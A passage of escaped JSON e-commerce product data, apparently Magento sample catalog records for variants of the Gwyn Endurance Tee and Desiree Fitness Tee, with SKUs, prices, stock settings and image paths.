Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1519\":{\"sku\":\"WS01-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-L-Black\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1520\":{\"sku\":\"WS01-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-L-Green\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1521\":{\"sku\":\"WS01-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-L-Yellow\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1522\":{\"sku\":\"WS01-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-XL-Black\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1523\":{\"sku\":\"WS01-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-XL-Green\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1524\":{\"sku\":\"WS01-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-XL-Yellow\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1525\":{\"sku\":\"WS01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=HeatTec&reg;|Polyester,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS01-XS-Black,size=XS,color=Black|sku=WS01-XS-Green,size=XS,color=Green|sku=WS01-XS-Yellow,size=XS,color=Yellow|sku=WS01-S-Black,size=S,color=Black|sku=WS01-S-Green,size=S,color=Green|sku=WS01-S-Yellow,size=S,color=Yellow|sku=WS01-M-Black,size=M,color=Black|sku=WS01-M-Green,size=M,color=Green|sku=WS01-M-Yellow,size=M,color=Yellow|sku=WS01-L-Black,size=L,color=Black|sku=WS01-L-Green,size=L,color=Green|sku=WS01-L-Yellow,size=L,color=Yellow|sku=WS01-XL-Black,size=XL,color=Black|sku=WS01-XL-Green,size=XL,color=Green|sku=WS01-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"HeatTec&reg;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1526\":{\"sku\":\"WS05-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-XS-Black\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"re